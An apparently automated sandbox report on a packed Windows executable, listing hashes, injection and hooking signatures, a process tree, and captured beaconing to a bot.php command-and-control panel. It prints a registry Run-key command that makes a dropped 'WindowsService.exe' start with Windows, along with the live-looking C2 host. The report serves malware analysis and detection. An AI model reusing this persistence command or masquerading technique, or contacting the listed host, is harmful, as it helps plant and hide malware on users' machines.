Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags
    arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
  • submitted
    25/05/2024, 19:30 UTC

General

  • Target

    1149ba2f4ab7b17b8baee8f4c9a5cb50_NeikiAnalytics.exe

  • Size

    102KB

  • MD5

    1149ba2f4ab7b17b8baee8f4c9a5cb50

  • SHA1

    b1b34e010dfaf2b5eae2ab15c48de1766ffa70c7

  • SHA256

    eb3fed4907ab931d7b7e767c050619f57796c595e4708193b7ea6d192df36d03

  • SHA512

    5115b2762fdeda7e045030af11079c6cc94e17d3f5af17ac48180bedd687d7def87cfbdd3acbab16243564c807360cabfba8601aa1c9f16ebdb6db01847d54fd

  • SSDEEP

    3072:xFphTfm1UC7AdYzrV+Dljy/32ubwZZqJ:FhTfmuCkdYzrVolu/J0ZZ

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 16 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\1149ba2f4ab7b17b8baee8f4c9a5cb50_NeikiAnalytics.exe
    "C:\Users\Admin\AppData\Local\Temp\1149ba2f4ab7b17b8baee8f4c9a5cb50_NeikiAnalytics.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2128
    • C:\Users\Admin\AppData\Local\Temp\1149ba2f4ab7b17b8baee8f4c9a5cb50_NeikiAnalytics.exe
      "C:\Users\Admin\AppData\Local\Temp\1149ba2f4ab7b17b8baee8f4c9a5cb50_NeikiAnalytics.exe"
      2⤵
      • Loads dropped DLL
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2588
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\BGVUI.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2488
        • C:\Windows\SysWOW64\reg.exe
          REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "sidebar" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe" /f
          4⤵
          • Adds Run key to start application
          PID:2516
      • C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe
        "C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2484
        • C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe
          "C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2656
        • C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe
          "C:\Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe"
          4⤵
          • Executes dropped EXE
          PID:2056

Network

  • flag-us
    DNS
    ilovetehpussay.host4star.com
    WindowsService.exe
    Remote address:
    8.8.8.8:53
    Request
    ilovetehpussay.host4star.com
    IN A
    Response
    ilovetehpussay.host4star.com
    IN A
    72.52.178.23
  • flag-us
    POST
    http://ilovetehpussay.host4star.com/Panel/bot.php
    WindowsService.exe
    Remote address:
    72.52.178.23:80
    Request
    POST /Panel/bot.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: umbra
    Host: ilovetehpussay.host4star.com
    Content-Length: 63
    Cache-Control: no-cache
  • flag-us
    POST
    http://ilovetehpussay.host4star.com/Panel/bot.php
    WindowsService.exe
    Remote address:
    72.52.178.23:80
    Request
    POST /Panel/bot.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: umbra
    Host: ilovetehpussay.host4star.com
    Content-Length: 49
    Cache-Control: no-cache
  • flag-us
    POST
    http://ilovetehpussay.host4star.com/Panel/bot.php
    WindowsService.exe
    Remote address:
    72.52.178.23:80
    Request
    POST /Panel/bot.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: umbra
    Host: ilovetehpussay.host4star.com
    Content-Length: 63
    Cache-Control: no-cache
  • flag-us
    POST
    http://ilovetehpussay.host4star.com/Panel/bot.php
    WindowsService.exe
    Remote address:
    72.52.178.23:80
    Request
    POST /Panel/bot.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: umbra
    Host: ilovetehpussay.host4star.com
    Content-Length: 49
    Cache-Control: no-cache
  • 72.52.178.23:80
    http://ilovetehpussay.host4star.com/Panel/bot.php
    http
    WindowsService.exe
    474 B
    172 B
    5
    4

    HTTP Request

    POST http://ilovetehpussay.host4star.com/Panel/bot.php
  • 72.52.178.23:80
    http://ilovetehpussay.host4star.com/Panel/bot.php
    http
    WindowsService.exe
    460 B
    172 B
    5
    4

    HTTP Request

    POST http://ilovetehpussay.host4star.com/Panel/bot.php
  • 72.52.178.23:80
    http://ilovetehpussay.host4star.com/Panel/bot.php
    http
    WindowsService.exe
    474 B
    172 B
    5
    4

    HTTP Request

    POST http://ilovetehpussay.host4star.com/Panel/bot.php
  • 72.52.178.23:80
    http://ilovetehpussay.host4star.com/Panel/bot.php
    http
    WindowsService.exe
    460 B
    172 B
    5
    4

    HTTP Request

    POST http://ilovetehpussay.host4star.com/Panel/bot.php
  • 8.8.8.8:53
    ilovetehpussay.host4star.com
    dns
    WindowsService.exe
    74 B
    90 B
    1
    1

    DNS Request

    ilovetehpussay.host4star.com

    DNS Response

    72.52.178.23

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\BGVUI.bat

    Filesize

    157B

    MD5

    f6a90c20834f271a907a4e2bc28184c2

    SHA1

    36c9d1602b74f622346fbb22693597d7889df48d

    SHA256

    73f29cd953eee40cea4de67842556ffd96efe8094a6a9b70f33a35df2582febd

    SHA512

    39cabae19fe1faa37455e4bd242c868be60d6252b07f01224b3f7501c3cf734e503300b840d83381a452707cab6df2f95f920655884be56d4024676b26943804

  • \Users\Admin\AppData\Roaming\SystemWindows\WindowsService.exe

    Filesize

    102KB

    MD5

    a122ac356ae49f2a385a6d233dfd6014

    SHA1

    0e006f642d2729f6edd1c325dd6fa0300e54eab1

    SHA256

    8ea8cb7b2c18891607b596e51fa18eba5370b3cf88f341fa14d92e077c55607d

    SHA512

    c1729e25670742f818cc9119551bc92d36f35e52a6be46715345863a81b4705e3f61727b6f55ea3a13cc0805c8a4835d650ba90f8c3466ea089afc4294c61978

  • memory/2128-447-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/2128-446-0x0000000002AB0000-0x0000000002AEB000-memory.dmp

    Filesize

    236KB

  • memory/2128-161-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/2128-82-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/2128-79-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/2128-64-0x0000000000408000-0x0000000000409000-memory.dmp

    Filesize

    4KB

  • memory/2128-452-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/2128-3-0x0000000000230000-0x0000000000231000-memory.dmp

    Filesize

    4KB

  • memory/2128-0-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/2128-126-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/2128-31-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/2484-494-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/2484-1045-0x0000000000400000-0x000000000043B000-memory.dmp

    Filesize

    236KB

  • memory/2588-448-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

  • memory/2588-493-0x0000000003360000-0x000000000339B000-memory.dmp

    Filesize

    236KB

  • memory/2588-484-0x0000000003360000-0x000000000339B000-memory.dmp

    Filesize

    236KB

  • memory/2588-1048-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

  • memory/2656-1041-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB

  • memory/2656-1053-0x0000000000400000-0x000000000040B000-memory.dmp

    Filesize

    44KB
